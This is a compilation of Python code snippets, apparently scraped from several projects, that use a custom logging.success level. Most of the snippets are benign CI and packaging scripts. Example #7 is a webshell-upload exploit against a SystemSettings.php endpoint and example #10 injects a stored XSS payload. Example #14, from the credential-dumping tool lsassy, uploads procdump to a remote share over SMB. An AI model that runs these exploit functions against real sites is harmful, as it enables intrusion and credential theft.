Code example #1
    def get_local_documents(self):
        logging.success("Grabbing local documents")
        self.documents = [
            os.path.join(self.working_directory, f) for f in os.listdir(self.working_directory)
            if f.split(".")[-1] in self.file_types
        ]
        return True
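
Note: success is not a level that Python's standard logging module provides; the projects in these examples register it themselves or use a wrapper library that does. A minimal sketch of how such a level can be wired up, assuming a module-level helper named success (the name is hypothetical, chosen to match the calls above):

import logging

SUCCESS = 25  # a custom level between INFO (20) and WARNING (30)
logging.addLevelName(SUCCESS, "SUCCESS")

def success(msg, *args, **kwargs):
    # Log msg at the custom SUCCESS level on the root logger.
    logging.log(SUCCESS, msg, *args, **kwargs)

logging.success = success  # so calls like logging.success("...") resolve

With this in place, logging.success("Grabbing local documents") behaves like logging.info but is reported under its own level name.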
Code example #2
def main():
    """ Main function for iterating over existing packs folder in content repo and creating json of all
    packs dependencies. The logic of pack dependency is identical to sdk find-dependencies command.

    """
    install_logging('Calculate_Packs_Dependencies.log',
                    include_process_name=True)
    option = option_handler()
    output_path = option.output_path
    id_set_path = option.id_set_path
    id_set = get_id_set(id_set_path)

    pack_dependencies_result = {}

    logging.info("Selecting packs for dependencies calculation")
    packs = select_packs_for_calculation()

    calculate_all_packs_dependencies(pack_dependencies_result, id_set, packs)

    logging.info(
        f"Number of created pack dependencies entries: {len(pack_dependencies_result.keys())}"
    )
    # finished iteration over pack folders
    logging.success("Finished dependencies calculation")

    with open(output_path, 'w') as pack_dependencies_file:
        json.dump(pack_dependencies_result, pack_dependencies_file, indent=4)

    logging.success(f"Created packs dependencies file at: {output_path}")
Code example #3
def RunTranslate(translate_func: typing.Callable,
                 run_with_tracing: bool = True):
    """Run `translate_func`, and communicate success or failure back to Daisy.

  Args:
    translate_func: Closure to execute
    run_with_tracing: When enabled, the closure will be executed with
    trace.Trace, resulting in executed lines being printed to stdout.
  """
    exit_code = 0
    try:
        if run_with_tracing:
            tracer = trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix],
                                 trace=1,
                                 count=0)
            tracer.runfunc(translate_func)
        else:
            translate_func()
        logging.success('Translation finished.')
    except Exception as e:
        exit_code = 1
        logging.debug(traceback.format_exc())
        logging.error('error: %s', str(e))
    logging.shutdown()
    sys.exit(exit_code)
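
The standard-library trace module used above also works standalone; a small sketch of the same Trace configuration applied to a toy function (the function is hypothetical):

import sys
import trace

def work():
    for i in range(3):
        print(i)

# trace=1 prints each executed line to stdout; count=0 disables line counting.
tracer = trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix], trace=1, count=0)
tracer.runfunc(work)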
Code example #4
    def delete(session, file_path, timeout=5):
        t = time.time()
        while True:
            try:
                session.smb_session.deleteFile("C$", file_path)
                logging.debug("File {}{} successfully deleted".format(
                    "C$", file_path))
                return True
            except BrokenPipeError:
                if time.time() - t > timeout:
                    logging.warning(
                        "File wasn't removed `{}{}`, connection lost".format(
                            "C$", file_path),
                        exc_info=True)
                    return None
                logging.debug("Trying to reconnect ...")
                if session.login():
                    logging.success(
                        "Reconnected after unexpected disconnection for proper cleanup"
                    )
            except Exception as e:
                if ("STATUS_OBJECT_NAME_NOT_FOUND" in str(e)
                        or "STATUS_NO_SUCH_FILE" in str(e)):
                    return True
                if time.time() - t > timeout:
                    logging.warning("File wasn't removed `{}{}`".format(
                        "C$", file_path),
                                    exc_info=True)
                    return None
                logging.debug(
                    "Unable to delete file `{}{}`. Retrying...".format(
                        "C$", file_path))
                time.sleep(0.5)
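
The shape of delete() above, retry until a deadline with special-cased exceptions, generalizes; a minimal sketch of the same pattern as a reusable helper (all names hypothetical):

import time

def retry_until(deadline_s, fn, retry_on=(Exception,), interval=0.5):
    # Call fn() until it succeeds or deadline_s seconds elapse, then re-raise.
    start = time.time()
    while True:
        try:
            return fn()
        except retry_on:
            if time.time() - start > deadline_s:
                raise
            time.sleep(interval)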
Code example #5
def download_and_extract_index(build_bucket: Bucket,
                               extract_destination_path: str,
                               build_bucket_base_path: str):
    """Downloads and extracts production and build indexes zip from cloud storage.

    Args:
        build_bucket (google.cloud.storage.bucket.Bucket): google storage bucket where build index.zip is stored.
        extract_destination_path (str): the full path of extract folder.
        build_bucket_base_path (str): the path in the build bucket of the index.
    Returns:
        str: extracted build index folder full path.
        Blob: google cloud storage object that represents prod index.zip blob.
        Blob: google cloud storage object that represents build index.zip blob.
        str: downloaded prod index generation.
        str: downloaded build index generation.

    """
    build_index_storage_path = os.path.join(build_bucket_base_path,
                                            f"{GCPConfig.INDEX_NAME}.zip")
    download_build_index_path = os.path.join(extract_destination_path,
                                             f"{GCPConfig.INDEX_NAME}.zip")

    build_index_blob = build_bucket.blob(build_index_storage_path)
    build_index_folder_path = os.path.join(extract_destination_path,
                                           GCPConfig.INDEX_NAME)

    if not os.path.exists(extract_destination_path):
        os.mkdir(extract_destination_path)

    if not build_index_blob.exists():
        logging.error(
            f"No build index was found in path: {build_index_storage_path}")
        sys.exit(1)

    build_index_blob.reload()
    build_index_generation = build_index_blob.generation
    build_index_blob.download_to_filename(
        download_build_index_path, if_generation_match=build_index_generation)

    if os.path.exists(download_build_index_path):
        with ZipFile(download_build_index_path, 'r') as index_zip:
            index_zip.extractall(extract_destination_path)

        if not os.path.exists(build_index_folder_path):
            logging.error(
                f"Failed creating build {GCPConfig.INDEX_NAME} folder with extracted data."
            )
            sys.exit(1)

        os.remove(download_build_index_path)
        logging.success(
            f"Finished downloading and extracting build {GCPConfig.INDEX_NAME} file to "
            f"{extract_destination_path}")

        return build_index_folder_path, build_index_blob, build_index_generation
    else:
        logging.error(
            f"Failed to download build {GCPConfig.INDEX_NAME}.zip file from cloud storage."
        )
        sys.exit(1)
Code example #6
def main():
  image = utils.GetMetadataAttribute('image', raise_on_not_found=True)
  package = utils.GetMetadataAttribute('gcs_package_path',
                                       raise_on_not_found=True)
  package_name = package.split('/')[-1]

  mount_disk = get_mount_disk(image)
  logging.info('Mount device %s at /mnt', mount_disk)
  run(f'mount {mount_disk} /mnt')

  # The rpm utility requires /dev/random to initialize GnuTLS
  logging.info('Mount dev filesystem in chroot')
  run('mount -o bind /dev /mnt/dev')

  utils.DownloadFile(package, f'/mnt/tmp/{package_name}')

  distribution = get_distro_from_image(image)
  if distribution == 'debian':
    util = 'apt-get'
  elif distribution == 'enterprise_linux':
    util = 'yum'
  else:
    logging.error('Unknown Linux distribution.')
    return

  logging.info('Installing package %s', package_name)
  run(f'chroot /mnt {util} install -y /tmp/{package_name}')

  # Best effort to unmount prior to shutdown.
  run('sync', check=False)
  run('umount /mnt/dev', check=False)
  run('umount /mnt', check=False)

  logging.success('Package %s installed successfully', package_name)
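
run() here is a project helper that is not shown; given the check=False keyword, it presumably wraps subprocess.run. A sketch under that assumption:

import shlex
import subprocess

def run(cmd: str, check: bool = True):
    # Split the shell-style command string and raise on non-zero exit when check=True.
    return subprocess.run(shlex.split(cmd), check=check)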
Code example #7
def exploit(url: str, file: str, delay: int) -> None:
    if not os.path.exists(file):
        logging.error(f'webshell payload "{file}" does not exist?')
        return
    logging.info(
        f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...'
    )
    uploadTime = int(time.time())
    r = requests.post(
        url + '/classes/SystemSettings.php',
        files={
            'img': (os.path.basename(file), open(file, 'rb'))
        },  # NOTE: can also use 'cover' field, but this is more inconspicuous
        params={'f': 'update_settings'},
        verify=False)
    if not r.ok:
        logging.error('HTTP upload request failed')
        return
    logging.info(
        f'finding new payload file name on target (+/- {delay} seconds) ...')
    for i in range(uploadTime - delay, uploadTime + delay + 1):
        r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}',
                         allow_redirects=False)
        logging.debug(
            f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
        # NOTE: website will send redirects for all files that do not exist
        if r.status_code != 302:
            logging.success(
                f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}'
            )
            return
    logging.error('failed to find payload on target')
    logging.warning(
        'maybe need a larger delay or uploads directory is not writable?')
    return
Code example #8
    def analyse_documents(self):
        logging.success(f"Analysing {len(self.documents)} documents")
        counter = 0
        for file_path in self.documents:
            logging.success(f"[{counter + 1}/{len(self.documents)}] {file_path}")

            extractor = Extractor(file_path).load()
            if extractor is None:
                logging.debug(f"Extractor for {file_path} does not exist")
                counter += 1
                continue

            try:
                extractor.get_metadata()
                for key, values in extractor.get_results().items():
                    if key in self.results:
                        for value in values:
                            if value not in self.results[key]:
                                self.results[key].append(value)
                    else:
                        self.results[key] = values
            except Exception as e:
                logging.warning(f"Error while parsing {file_path}", exc_info=True)
                counter += 1
                continue
            counter += 1
        return len(self.documents) == 0 or self.results
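
The merge loop above deduplicates with a membership test against a list, which is quadratic in the number of values; when result ordering does not matter, a set-based merge does the same work in linear time (a sketch, with extractor_results as a hypothetical stand-in for extractor.get_results()):

from collections import defaultdict

results = defaultdict(set)
for key, values in extractor_results.items():
    results[key].update(values)  # set union replaces the per-value membership test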
Code example #9
File: remote.py Project: acoomans/prvsn
    def copy_package(self, ssh):
        logging.header('Sending package to ' + ssh.hostname)
        ssh.copy_to(self._package, self._package)

        for line in ssh.output:
            logging.debug(line)

        exit_code = 0

        if ssh.error:
            for line in ssh.error:
                logging.error(line)
                exit_code = 1

        if ssh.returncode is None:
            pass
        elif ssh.returncode == 0:
            logging.debug('return code: 0')
        elif ssh.returncode > 0:
            logging.error('return code: ' + str(ssh.returncode))
            exit_code = 1

        if exit_code:
            logging.error('Sending package failed.')
            sys.exit(exit_code)

        logging.success('Sent.')
Code example #10
def exploit(url: str, file: str) -> None:
    if not os.path.exists(file):
        logging.error(f'{file} does not exist?')
        return
    logging.info(f'reading {file} for XSS content ...')
    with open(file, 'r') as f:
        xssPayload = f.read()
    logging.info(
        f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...'
    )
    r = requests.post(url + '/classes/SystemSettings.php',
                      data={'about_us': xssPayload},
                      params={'f': 'update_settings'},
                      verify=False)
    if not r.ok:
        logging.error('HTTP request failed')
        return
    logging.info('checking for XSS payload on main page ...')
    r = requests.get(url)
    if xssPayload not in r.text:
        logging.error(f'XSS injection failed? received: {r.text}')
        logging.warning('maybe about.html is not writable?')
        return
    logging.success('XSS payload found on target website')
    return
Code example #11
File: remote.py Project: acoomans/prvsn
    def execute_package(self, ssh):
        logging.header('Remotely executing package on ' + ssh.hostname)

        ssh.run_command(['python', self._package], sudo=self._sudo)

        if ssh.output:
            for line in ssh.output:
                logging.info(line)

        exit_code = 0

        if ssh.error:
            for line in ssh.error:
                logging.error(line)
                exit_code = 1

        if ssh.returncode is None:
            pass
        elif ssh.returncode == 0:
            logging.debug('return code: 0')
        elif ssh.returncode > 0:
            logging.error('return code: ' + str(ssh.returncode))
            exit_code = 1

        if exit_code:
            logging.error('Remotely executing package failed.')
            sys.exit(exit_code)

        logging.success('Remote package executed.')
Code example #12
def print_packs_summary(packs_list: list):
    """Prints summary of packs uploaded to gcs.

    Args:
        packs_list (list): list of initialized packs.

    """
    successful_packs = [
        pack for pack in packs_list if pack.status == PackStatus.SUCCESS.name
    ]
    skipped_packs = [
        pack for pack in packs_list
        if pack.status == PackStatus.PACK_ALREADY_EXISTS.name
        or pack.status == PackStatus.PACK_IS_NOT_UPDATED_IN_RUNNING_BUILD.name
        or pack.status == PackStatus.FAILED_DETECTING_MODIFIED_FILES.name
    ]
    failed_packs = [
        pack for pack in packs_list
        if pack not in successful_packs and pack not in skipped_packs
    ]

    logging.info(f"""\n
------------------------------------------ Packs Upload Summary ------------------------------------------
Total number of packs: {len(packs_list)}
----------------------------------------------------------------------------------------------------------"""
                 )

    if successful_packs:
        successful_packs_table = _build_summary_table(successful_packs)
        logging.success(
            f"Number of successful uploaded packs: {len(successful_packs)}")
        logging.success(f"Uploaded packs:\n{successful_packs_table}")
        with open('pack_list.txt', 'w') as f:
            f.write(successful_packs_table.get_string())
    if skipped_packs:
        skipped_packs_table = _build_summary_table(skipped_packs)
        logging.warning(f"Number of skipped packs: {len(skipped_packs)}")
        logging.warning(f"Skipped packs:\n{skipped_packs_table}")
    if failed_packs:
        failed_packs_table = _build_summary_table(failed_packs,
                                                  include_pack_status=True)
        logging.critical(f"Number of failed packs: {len(failed_packs)}")
        logging.critical(f"Failed packs:\n{failed_packs_table}")
        sys.exit(1)

    # for external pull requests - when there are no failed packs, add the build summary to the pull request
    branch_name = os.environ.get('CIRCLE_BRANCH')
    if branch_name and branch_name.startswith('pull/'):
        successful_packs_table = build_summary_table_md(successful_packs)

        build_num = os.environ['CIRCLE_BUILD_NUM']

        bucket_path = f'https://console.cloud.google.com/storage/browser/' \
            f'marketplace-ci-build/content/builds/{branch_name}/{build_num}'

        pr_comment = f'Number of successfully uploaded packs: {len(successful_packs)}\n' \
            f'Uploaded packs:\n{successful_packs_table}\n\n' \
            f'Browse to the build bucket with this address:\n{bucket_path}'

        add_pr_comment(pr_comment)
Code example #13
def upload_core_packs_config(production_bucket: Bucket, build_number: str,
                             extract_destination_path: str,
                             build_bucket: Bucket):
    """Uploads corepacks.json file configuration to bucket. Corepacks file includes core packs for server installation.

     Args:
        production_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where core packs config is uploaded.
        build_number (str): CircleCI build number.
        extract_destination_path (str): Full path of folder to extract the corepacks file
        build_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where core packs config is downloaded from.

    """
    # download the corepacks.json stored in the build bucket to temp dir
    build_corepacks_file_path = os.path.join(GCPConfig.BUILD_BASE_PATH,
                                             GCPConfig.CORE_PACK_FILE_NAME)
    build_corepacks_blob = build_bucket.blob(build_corepacks_file_path)

    if not build_corepacks_blob.exists():
        logging.critical(
            f"{GCPConfig.CORE_PACK_FILE_NAME} is missing in {build_bucket.name} bucket, exiting..."
        )
        sys.exit(1)

    temp_corepacks_file_path = os.path.join(extract_destination_path,
                                            GCPConfig.CORE_PACK_FILE_NAME)
    build_corepacks_blob.download_to_filename(temp_corepacks_file_path)
    corepacks_file = load_json(temp_corepacks_file_path)

    # change the storage paths to the prod bucket
    corepacks_list = corepacks_file.get('corePacks', [])
    try:
        corepacks_list = [
            os.path.join(GCPConfig.GCS_PUBLIC_URL, production_bucket.name,
                         GCPConfig.STORAGE_BASE_PATH,
                         LATEST_ZIP_REGEX.findall(corepack_path)[0])
            for corepack_path in corepacks_list
        ]
    except IndexError:
        corepacks_list_str = '\n'.join(corepacks_list)
        logging.exception(
            f"GCS paths in build bucket corepacks.json file are not of format: "
            f"{GCPConfig.GCS_PUBLIC_URL}/<BUCKET_NAME>/.../content/packs/...\n"
            f"List of build bucket corepacks paths:\n{corepacks_list_str}")
        sys.exit(1)

    # construct core pack data with public gcs urls
    core_packs_data = {
        'corePacks': corepacks_list,
        'buildNumber': build_number
    }

    # upload core pack json file to gcs
    prod_corepacks_file_path = os.path.join(GCPConfig.STORAGE_BASE_PATH,
                                            GCPConfig.CORE_PACK_FILE_NAME)
    prod_corepacks_blob = production_bucket.blob(prod_corepacks_file_path)
    prod_corepacks_blob.upload_from_string(
        json.dumps(core_packs_data, indent=4))

    logging.success(
        f"Finished uploading {GCPConfig.CORE_PACK_FILE_NAME} to storage.")
Code example #14
File: procdump.py Project: ASkyeye/lsassy
    def prepare(self, options):
        self.procdump = options.get("procdump", self.procdump)
        self.procdump_path = options.get("procdump_path", self.procdump_path)
        self.procdump_remote_share = options.get("procdump_remote_share",
                                                 self.procdump_remote_share)
        self.procdump_remote_path = options.get("procdump_remote_path",
                                                self.procdump_remote_path)

        if not self.procdump_path:
            logging.error("Missing procdump_path")
            return None

        if not os.path.exists(self.procdump_path):
            logging.error("{} does not exist.".format(self.procdump_path))
            return None

        # Upload procdump
        logging.debug('Copy {} to {}'.format(self.procdump_path,
                                             self.procdump_remote_path))
        with open(self.procdump_path, 'rb') as p:
            try:
                self._session.smb_session.putFile(
                    self.procdump_remote_share,
                    self.procdump_remote_path + self.procdump, p.read)
                logging.success("Procdump successfully uploaded")
                self.procdump_uploaded = True
                return True
            except Exception as e:
                logging.error("Procdump upload error", exc_info=True)
                return None
Code example #15
def main():
    install_logging("TriggerPrivateBuild.log")
    # get github token parameter
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--github-token', help='Github token')
    args = arg_parser.parse_args()

    github_token = args.github_token

    # get branch name
    branches = tools.run_command("git branch")
    branch_name_regex = re.search(r"\* (.*)", branches)
    branch_name = branch_name_regex.group(1)

    if branch_has_private_build_infra_change(branch_name):
        # get the workflows ids before triggering the build
        pre_existing_workflow_ids = get_dispatch_workflows_ids(github_token, 'master')

        # trigger private build
        payload = {'event_type': f'Trigger private build from content/{branch_name}',
                   'client_payload': {'commit_sha1': branch_name, 'is_infra_build': 'True'}}

        res = requests.post(TRIGGER_BUILD_URL,
                            headers={'Accept': 'application/vnd.github.everest-preview+json',
                                     'Authorization': f'Bearer {github_token}'},
                            data=json.dumps(payload),
                            verify=False)

        if res.status_code != 204:
            logging.critical(f'Failed to trigger private repo build, request to '
                             f'{TRIGGER_BUILD_URL} failed with error: {str(res.content)}')
            sys.exit(1)

        workflow_ids_diff = []
        for i in range(GET_WORKFLOWS_MAX_RETRIES):
            # wait 5 seconds and get the workflow ids again
            time.sleep(5)
            workflow_ids_after_dispatch = get_dispatch_workflows_ids(github_token, 'master')

            # compare with the first workflows list to get the current id
            workflow_ids_diff = [x for x in workflow_ids_after_dispatch if x not in pre_existing_workflow_ids]
            if workflow_ids_diff:
                break

        if len(workflow_ids_diff) == 1:
            workflow_id = workflow_ids_diff[0]
            logging.success(f'Private repo build triggered successfully, workflow id: {workflow_id}\n URL:'
                            f' {WORKFLOW_HTML_URL}/{workflow_id}')

            # write the workflow id to text file to use it in get_private_build_status.py
            with open(PRIVATE_REPO_WORKFLOW_ID_FILE, "w") as f:
                f.write(str(workflow_id))
            sys.exit(0)

        else:
            logging.critical('Could not find the private repo workflow')
            sys.exit(1)

    else:
        logging.info('Build private repo skipped')
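
TRIGGER_BUILD_URL is defined elsewhere; given the headers and the 204 status check, it presumably points at GitHub's repository_dispatch endpoint, which has the form https://api.github.com/repos/<owner>/<repo>/dispatches and answers 204 No Content on success. A sketch of the same trigger in isolation (owner/repo placeholders hypothetical):

import json
import requests

def trigger_dispatch(token: str, event_type: str, client_payload: dict) -> bool:
    res = requests.post(
        'https://api.github.com/repos/<owner>/<repo>/dispatches',
        headers={'Accept': 'application/vnd.github.everest-preview+json',
                 'Authorization': f'Bearer {token}'},
        data=json.dumps({'event_type': event_type,
                         'client_payload': client_payload}))
    return res.status_code == 204  # GitHub returns 204 No Content on success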
Code example #16
def upload_index_to_storage(index_folder_path: str,
                            extract_destination_path: str,
                            index_blob: Any,
                            build_number: str,
                            private_packs: list,
                            current_commit_hash: str,
                            index_generation: str,
                            is_private: bool = False):
    """
    Upload updated index zip to cloud storage.

    :param index_folder_path: index folder full path.
    :param extract_destination_path: extract folder full path.
    :param index_blob: google cloud storage object that represents index.zip blob.
    :param build_number: circleCI build number, used as an index revision.
    :param private_packs: List of private packs and their price.
    :param current_commit_hash: last commit hash of head.
    :param index_generation: downloaded index generation.
    :param is_private: Indicates if upload is private.
    :return: None

    """
    with open(os.path.join(index_folder_path, f"{GCPConfig.INDEX_NAME}.json"),
              "w+") as index_file:
        index = {
            'revision': build_number,
            'modified': datetime.utcnow().strftime(Metadata.DATE_FORMAT),
            'packs': private_packs,
            'commit': current_commit_hash
        }
        json.dump(index, index_file, indent=4)

    index_zip_name = os.path.basename(index_folder_path)
    index_zip_path = shutil.make_archive(base_name=index_folder_path,
                                         format="zip",
                                         root_dir=extract_destination_path,
                                         base_dir=index_zip_name)
    try:
        index_blob.reload()
        current_index_generation = index_blob.generation
        index_blob.cache_control = "no-cache,max-age=0"  # disabling caching for index blob

        if is_private or current_index_generation == index_generation:
            index_blob.upload_from_filename(index_zip_path)
            logging.success(
                f"Finished uploading {GCPConfig.INDEX_NAME}.zip to storage.")
        else:
            logging.critical(
                f"Failed in uploading {GCPConfig.INDEX_NAME}, mismatch in index file generation"
            )
            logging.critical(
                f"Downloaded index generation: {index_generation}")
            logging.critical(
                f"Current index generation: {current_index_generation}")
            sys.exit(0)
    except Exception:
        logging.exception(f"Failed in uploading {GCPConfig.INDEX_NAME}.")
        sys.exit(1)
    finally:
        shutil.rmtree(index_folder_path)
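
The reload()/generation comparison above is a read-then-write check, so a competing writer can still slip in between the comparison and the upload. Cloud Storage can enforce the same precondition atomically on the write; a sketch, assuming the same index_blob and that index_generation holds the generation recorded at download time:

from google.api_core.exceptions import PreconditionFailed

try:
    # The server rejects the write if the blob's generation no longer matches.
    index_blob.upload_from_filename(index_zip_path,
                                    if_generation_match=index_generation)
except PreconditionFailed:
    logging.critical(f"Failed in uploading {GCPConfig.INDEX_NAME}, "
                     f"mismatch in index file generation")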
Code example #17
def main():
    install_logging('Install_Packs.log')
    options = options_handler()

    # Get the host by the ami env
    hosts, _ = Build.get_servers(ami_env=options.ami_env)

    logging.info('Retrieving the credentials for Cortex XSOAR server')
    secret_conf_file = get_json_file(path=options.secret)
    username: str = secret_conf_file.get('username')
    password: str = secret_conf_file.get('userPassword')

    # Configure the Servers
    for host in hosts:
        server = Server(host=host, user_name=username, password=password)
        logging.info(f'Adding Marketplace configuration to {host}')
        error_msg: str = 'Failed to set marketplace configuration.'
        server.add_server_configuration(config_dict=MARKET_PLACE_CONFIGURATION, error_msg=error_msg)
        set_marketplace_url(servers=[server], branch_name=options.branch, ci_build_number=options.build_number)

        # Acquire the server's host and install all content packs (one threaded execution)
        logging.info(f'Starting to install all content packs in {host}')
        server_host: str = server.client.api_client.configuration.host
        install_all_content_packs(client=server.client, host=server_host)
        logging.success(f'Finished installing all content packs in {host}')
Code example #18
def copy_id_set(production_bucket: Bucket, build_bucket: Bucket):
    """ Copies the id_set.json artifact from the build bucket to the production bucket.

    Args:
        production_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where id_set is copied to.
        build_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where id_set is copied from.
    """

    build_id_set_path = os.path.join(
        os.path.dirname(GCPConfig.BUILD_BASE_PATH), 'id_set.json')
    build_id_set_blob = build_bucket.blob(build_id_set_path)

    if not build_id_set_blob.exists():
        logging.error(
            f"id_set.json file does not exists in build bucket in path: {build_id_set_path}"
        )

    prod_id_set_path = os.path.join(
        os.path.dirname(GCPConfig.STORAGE_BASE_PATH), 'id_set.json')
    copied_blob = build_bucket.copy_blob(blob=build_id_set_blob,
                                         destination_bucket=production_bucket,
                                         new_name=prod_id_set_path)

    if not copied_blob.exists():
        logging.error(f"Failed to upload id_set.json to {prod_id_set_path}")
    else:
        logging.success("Finished uploading id_set.json to storage.")
Code example #19
def install_packs(client: demisto_client,
                  host: str,
                  packs_to_install: list,
                  request_timeout: int = 999999,
                  is_nightly: bool = False):
    """ Make a packs installation request.

    Args:
        client (demisto_client): The configured client to use.
        host (str): The server URL.
        packs_to_install (list): A list of the packs to install.
        request_timeout (int): Timeout settings for the installation request.
        is_nightly (bool): Is the build nightly or not.
    """
    if is_nightly:
        install_nightly_packs(client, host, packs_to_install)
        return
    request_data = {'packs': packs_to_install, 'ignoreWarnings': True}
    logging.info(f'Installing packs on server {host}')
    packs_to_install_str = ', '.join([pack['id'] for pack in packs_to_install])
    logging.debug(
        f'Installing the following packs on server {host}:\n{packs_to_install_str}'
    )

    # make the pack installation request
    try:
        response_data, status_code, _ = demisto_client.generic_request_func(
            client,
            path='/contentpacks/marketplace/install',
            method='POST',
            body=request_data,
            accept='application/json',
            _request_timeout=request_timeout)

        if 200 <= status_code < 300:
            packs_data = [{
                'ID': pack.get('id'),
                'CurrentVersion': pack.get('currentVersion')
            } for pack in ast.literal_eval(response_data)]
            logging.success(
                f'Packs were successfully installed on server {host}')
            logging.debug(
                f'The following packs were successfully installed on server {host}:\n{packs_data}'
            )
        else:
            result_object = ast.literal_eval(response_data)
            message = result_object.get('message', '')
            raise Exception(
                f'Failed to install packs - with status code {status_code}\n{message}'
            )
    except Exception as e:
        logging.exception(
            f'The request to install packs has failed. Additional info: {str(e)}'
        )
        global SUCCESS_FLAG
        SUCCESS_FLAG = False

    finally:
        return SUCCESS_FLAG
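
A hypothetical invocation of install_packs, assuming a demisto-py client configured with an API key (the URL, key, and pack values are illustrative only):

client = demisto_client.configure(base_url='https://xsoar.example.com',
                                  api_key='<API_KEY>',
                                  verify_ssl=False)
install_packs(client,
              host='https://xsoar.example.com',
              packs_to_install=[{'id': 'Base', 'version': '1.0.0'}])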
Code example #20
def RunTranslate(translate_func):
  try:
    tracer = trace.Trace(
        ignoredirs=[sys.prefix, sys.exec_prefix], trace=1, count=0)
    tracer.runfunc(translate_func)
    logging.success('Translation finished.')
  except Exception as e:
    logging.error('error: %s', str(e))
Code example #21
    def output_results(self):
        for key, values in self.results.items():
            if len(values) == 0 or all("" == v.strip() for v in values):
                continue
            print("")
            logging.success(logger.highlight(key.upper()))
            for value in list(set(values)):
                logging.success(value)
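
list(set(values)) deduplicates but discards insertion order; where order matters, dict.fromkeys is an order-preserving alternative on Python 3.7+:

for value in dict.fromkeys(values):
    logging.success(value)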
Code example #22
def main():
    """ Main function for iterating over existing packs folder in content repo and creating json of all
    packs dependencies. The logic of pack dependency is identical to sdk find-dependencies command.

    """
    install_logging('Calculate Packs Dependencies.log')
    option = option_handler()
    output_path = option.output_path
    id_set_path = option.id_set_path
    IGNORED_FILES.append(
        GCPConfig.BASE_PACK)  # skip dependency calculation of Base pack
    # loading id set json
    with open(id_set_path, 'r') as id_set_file:
        id_set = json.load(id_set_file)

    pack_dependencies_result = {}

    logging.info("Starting dependencies calculation")
    # starting iteration over pack folders
    for pack in os.scandir(PACKS_FULL_PATH):
        if not pack.is_dir() or pack.name in IGNORED_FILES:
            logging.warning(
                f"Skipping dependency calculation of {pack.name} pack.")
            continue  # skipping ignored packs
        logging.info(f"Calculating {pack.name} pack dependencies.")

        try:
            dependency_graph = PackDependencies.build_dependency_graph(
                pack_id=pack.name,
                id_set=id_set,
                verbose_file=VerboseFile(''),
            )
            first_level_dependencies, all_level_dependencies = parse_for_pack_metadata(
                dependency_graph, pack.name)

        except Exception:
            logging.exception(
                f"Failed calculating {pack.name} pack dependencies")
            continue

        pack_dependencies_result[pack.name] = {
            "dependencies": first_level_dependencies,
            "displayedImages": list(first_level_dependencies.keys()),
            "allLevelDependencies": all_level_dependencies,
            "path": os.path.join(PACKS_FOLDER, pack.name),
            "fullPath": pack.path
        }

    logging.info(
        f"Number of created pack dependencies entries: {len(pack_dependencies_result.keys())}"
    )
    # finished iteration over pack folders
    logging.success("Finished dependencies calculation")

    with open(output_path, 'w') as pack_dependencies_file:
        json.dump(pack_dependencies_result, pack_dependencies_file, indent=4)

    logging.success(f"Created packs dependencies file at: {output_path}")
Code example #23
    def worker_done(self, worker_name, success):
        if success:
            logging.success("{} - Done rendering".format(worker_name))
        else:
            logging.error("{} - Error while rendering".format(worker_name))
        worker = self.workers.pop(worker_name, None)
        if worker:
            worker.setVisible(False)
            self.layout().removeWidget(worker)
Code example #24
def test_instances(secret_conf_path, server, username, password):
    integrations = get_integrations(secret_conf_path)

    instance_ids = []
    failed_integrations = []
    integrations_counter = 0

    content_installation_client = demisto_client.configure(base_url=server,
                                                           username=username,
                                                           password=password,
                                                           verify_ssl=False)
    install_new_content(content_installation_client, server)
    for integration in integrations:
        c = demisto_client.configure(base_url=server,
                                     username=username,
                                     password=password,
                                     verify_ssl=False)
        integrations_counter += 1
        integration_name = integration.get('name')
        integration_instance_name = integration.get('instance_name', '')
        integration_params = integration.get('params')
        devops_comments = integration.get('devops_comments')
        product_description = integration.get('product_description', '')
        is_byoi = integration.get('byoi', True)
        has_integration = integration.get('has_integration', True)
        validate_test = integration.get('validate_test', True)

        if has_integration:
            instance_id, failure_message, _ = __create_integration_instance(
                server,
                username,
                password,
                integration_name,
                integration_instance_name,
                integration_params,
                is_byoi,
                validate_test=validate_test)
            if failure_message == 'No configuration':
                logging.warning(
                    f"skipping {integration_name} as it exists in content-test-conf conf.json but not in content repo"
                )
                continue
            if not instance_id:
                logging.error(
                    f'Failed to create instance of {integration_name} with message: {failure_message}'
                )
                failed_integrations.append(
                    "{} {} - devops comments: {}".format(
                        integration_name, product_description,
                        devops_comments))
            else:
                instance_ids.append(instance_id)
                logging.success(
                    f'Creating integration {integration_name} succeeded')
                __delete_integrations_instances(c, instance_ids)

    return failed_integrations, integrations_counter
Code example #25
File: remote.py Project: acoomans/prvsn
    def run(self):

        ssh = Ssh(hostname=self._hostname, username=self._username)

        self.manage_public_keys(ssh)
        self.copy_package(ssh)
        self.execute_package(ssh)

        logging.success('Remote provisioned.')
Code example #26
def submit_dss_subscription(view, vertex_list, request_uuid):
    subscription_time_delta = 30
    myDSSSubscriber = dss_rid_helper.RemoteIDOperations()
    subscription_created = myDSSSubscriber.create_dss_subscription(
        vertex_list=vertex_list,
        view_port=view,
        request_uuid=request_uuid,
        subscription_time_delta=subscription_time_delta)
    logging.success("Subscription creation status: %s" %
                    subscription_created['created'])
Code example #27
File: upload_packs.py Project: magnetb0y/content
def print_packs_summary(successful_packs: list,
                        skipped_packs: list,
                        failed_packs: list,
                        fail_build: bool = True):
    """Prints summary of packs uploaded to gcs.

    Args:
        successful_packs (list): list of packs that were successfully uploaded.
        skipped_packs (list): list of packs that were skipped during upload.
        failed_packs (list): list of packs that were failed during upload.
        fail_build (bool): indicates whether to fail the build upon failing pack to upload or not

    """
    logging.info(f"""\n
------------------------------------------ Packs Upload Summary ------------------------------------------
Total number of packs: {len(successful_packs + skipped_packs + failed_packs)}
----------------------------------------------------------------------------------------------------------"""
                 )

    if successful_packs:
        successful_packs_table = _build_summary_table(successful_packs)
        logging.success(
            f"Number of successful uploaded packs: {len(successful_packs)}")
